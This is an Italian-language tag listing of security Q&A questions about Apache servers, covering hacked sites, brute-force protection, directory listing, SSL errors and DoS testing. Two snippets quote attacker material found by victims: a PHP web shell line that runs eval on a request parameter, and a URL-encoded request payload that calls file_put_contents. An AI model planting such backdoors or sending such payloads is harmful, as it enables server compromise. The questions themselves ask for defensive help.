Domande con tag 'apache'

domande con tag
2
risposte

ModSecurity può difendersi dagli attacchi Brute Force anche su PHPmyadmin e WordPress?

Il software ModSecurity può difendere anche da attacchi Brute Force su PHPmyadmin e WordPress? Una particolare società di hosting che fornisce hosting condiviso mi ha detto che ModSecurity dovrebbe coprire PHPmyadmin e WordPress, nonché la lo...
posta 11.01.2018 - 06:12
3
risposte

Come posso determinare da dove proviene lo script iniettato?

Ho un server che al momento è stato violato. I file vengono creati sul mio server con contenuti di questo tipo: if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/} O come questo: <?php /*auV*/if/*fpFF*/(i...
posta 20.07.2017 - 13:25
1
risposta

Esecuzione della funzione PHP attraverso la richiesta HTTP GET di hacker [duplicato]

Riceviamo continuamente richieste successive sul nostro server Apache dagli hacker ?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0); @set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILEN...
posta 20.09.2017 - 06:32
1
risposta

Elenco di directory per icone e cartelle di immagini

Sto testando un'applicazione web sul server Apache, che consente di elencare directory come link e link . Questa directory contiene solo immagini. Dovrei raccomandare di non consentire l'elenco delle directory per tutte le directory come b...
posta 31.10.2017 - 17:13
1
risposta

Il sito Web utilizza un protocollo non supportato. ERR_SSL_VERSION_OR_CIPHER_MISMATCH

Ho appena installato un nuovo certificato jolly sul mio server Ubuntu (prima c'era un solo certificato installato). Ho modificato /etc/apache2/sites-available/000-default.conf che è per uno specifico sottodominio e aggiornato i percorsi: <V...
posta 17.05.2017 - 04:09
1
risposta

La visualizzazione di Google di una pagina Web è danneggiata

Recentemente, uno dei miei siti Web è stato violato in modo molto interessante. Facendo alcune ricerche ho scoperto che non ero l'unico colpito dall'hack, ma non ho trovato nulla al riguardo. Nota: descriverò il mio sito web, ma dopo ave...
posta 10.05.2017 - 13:53
3
risposte

Ottieni l'IP del server web situato a livello di sottodirectory

Di solito uso ping o tracert per ottenere indirizzi IP per domini o sottodomini e funziona davvero bene. Tuttavia, mi sono imbattuto in un sito che sembra utilizzare un proxy inverso o qualcosa di simile perché una richiesta a una sott...
posta 07.02.2017 - 12:17
1
risposta

Apache Mod_Proxy Vulnerabilità legata all'overflow del buffer di contenuto negativo a lunghezza negativa

Abbiamo un Windows Server 2012 R2 con Apache 2.2.27 e Apache tomcat8 versione 1.0.15.0. Riesci a dire qualche parola su quale sia la vulnerabilità e anche come re-mediare questo con le due versioni che stiamo eseguendo nel nostro ambiente.  ...
posta 01.11.2016 - 19:54
1
risposta

server Apache compromesso con un referente di reindirizzamento di backdoor apache [duplicato]

Ogni volta che provo ad accedere al mio sito web viene reindirizzato a qualche sito di spam dannoso, dopo molte ricerche ho trovato termine apache backdoor redirect referer , ho accesso root a cpanel e whm. Ho bisogno di aiuto per rimuove...
posta 23.12.2016 - 11:28
1
risposta

Quali modelli di traffico L7 possono rendere più semplice DoS un server Web Apache?

Abbiamo un singolo generatore di carico HTTP JMeter che usiamo per testare la capacità del nostro servizio web (eseguendo Django + mod-wsgi + Apache)? Se vogliamo modificare il traffico generato a DoS dal nostro servizio web, quali sono le modif...
posta 26.12.2016 - 05:45